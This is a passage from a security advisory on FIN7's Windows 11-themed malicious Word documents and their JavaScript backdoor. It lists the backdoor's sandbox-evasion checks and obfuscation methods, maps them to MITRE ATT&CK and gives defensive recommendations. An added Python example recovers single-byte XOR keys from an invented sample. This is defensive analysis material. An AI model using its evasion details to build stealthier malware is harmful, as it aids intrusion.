It’s important to note that the script also ceases operation if a VM is detected or if the system does not have more than 4GB of RAM available.[3] If the checks pass, the script drops a file called word_data.js into the TEMP folder.[3] The JavaScript backdoor appears to share functionality with other backdoors used by the threat group in the past.[3] The script then reaches out to a domain to pass the host’s IP and DNS information.[3] The backdoor allows attackers to deliver any payload they want to the target machine and represents a foothold for future attacks.[2]
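Both this document's hidden table and the XOR-encrypted configuration noted for SparrowDoor in the previous advisory are the same analysis problem: a blob that is plaintext XORed with a key. The block below is an added example for both passages, not code from Anomali, ESET, or the advisory, showing the standard analyst approach of trying every single-byte key and keeping the candidate that looks most like text. The plaintext table, the key 0x5A, and the text-likeness weights are constructed assumptions; the real samples' keys and key lengths are not stated on the page.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; a one-byte key is the single-byte case."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def text_likeness(buf: bytes) -> int:
    """Score how much a buffer looks like ASCII text. Letters and spaces score
    highest, digits next, other printable bytes low, control bytes strongly
    negative. The weights are assumptions chosen for this example."""
    score = 0
    for b in buf:
        if b == 0x20 or 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A:
            score += 3
        elif 0x30 <= b <= 0x39:
            score += 2
        elif 0x21 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D):
            score += 1
        else:
            score -= 10
    return score


def recover_single_byte_xor(blob: bytes):
    """Try all 256 single-byte keys; return (key, plaintext) with the best score."""
    best_key, best_plain, best_score = None, b"", None
    for key in range(256):
        candidate = xor_bytes(blob, bytes([key]))
        s = text_likeness(candidate)
        if best_score is None or s > best_score:
            best_key, best_plain, best_score = key, candidate, s
    return best_key, best_plain


# Constructed sample: a config-like table obfuscated with key 0x5A. The content is
# invented for this example and is not an extract from either malware family.
SAMPLE_PLAINTEXT = b"Key: 7F3A9C; Table: ru, uk, be, pl; Min RAM: 4 GB"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, b"\x5a")


def demo():
    """Recover the key and plaintext from SAMPLE_BLOB without being told the key."""
    return recover_single_byte_xor(SAMPLE_BLOB)


if __name__ == "__main__":
    key, plain = demo()
    print(f"recovered key 0x{key:02x}: {plain!r}")
```

If no single-byte key yields a high score, the sample is probably using a multi-byte repeating key; the usual next step is to estimate the key length from repeating patterns in the blob and then run this same single-byte search independently over each key position, which is why `xor_bytes` already accepts a multi-byte key.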

IV. MITRE ATT&CK

  • T1059.005 – Command and Scripting Interpreter: Visual Basic
    FIN7 used VBS scripts to help perform tasks on the victim’s machine.
  • T1059.007 – Command and Scripting Interpreter: JavaScript
    FIN7 used JavaScript scripts to help perform tasks on the victim’s machine.
  • T1204.002 – User Execution: Malicious File
    FIN7 lures victims to “Enable Editing and Enable Content,” which would execute malicious files in the document.
  • T1047 – Windows Management Instrumentation
    FIN7 may abuse Windows Management Instrumentation (WMI) to achieve execution.
  • T1140 – Deobfuscate/Decode Files or Information
    FIN7 uses a hidden table inside the .doc file.
  • T1027 – Obfuscated Files or Information
    FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.
  • T1497 – Virtualization/Sandbox Evasion
    If a VM is detected, the script is killed.
  • T1497.001 – Virtualization/Sandbox Evasion: System Checks
    The script used by FIN7 checks for virtual machines and, if one is detected, stops running.
  • T1087.002 – Account Discovery: Domain Account
    The script will check for specific domains.

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
  • Malware Monitoring
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The links below have been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/te8lijr921avv32tnb8tmquzmdlskvt8

VII. References

(1) Seals, Tara. “Fin7 Capitalizes on Windows 11 Release in Latest Gambit.” Threatpost English Global. Accessed September 9, 2021. https://threatpost.com/fin7-windows-11-release/169206/.

(2) Ilascu, Ionut. “Watch out for New Malware Campaign’s ‘Windows 11 Alpha’ Attachment.” BleepingComputer. BleepingComputer, September 4, 2021. https://www.bleepingcomputer.com/news/security/watch-out-for-new-malware-campaign-s-windows-11-alpha-attachment/.

(3) Anomali Threat Research. “FIN7 Using Windows 11 Alpha-Themed Docs to Drop JAVASCRIPT Backdoor.” Anomali. Accessed September 9, 2021. https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor.

Threat Advisory created by the Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, and Tural Hagverdiyev.

September 10, 2021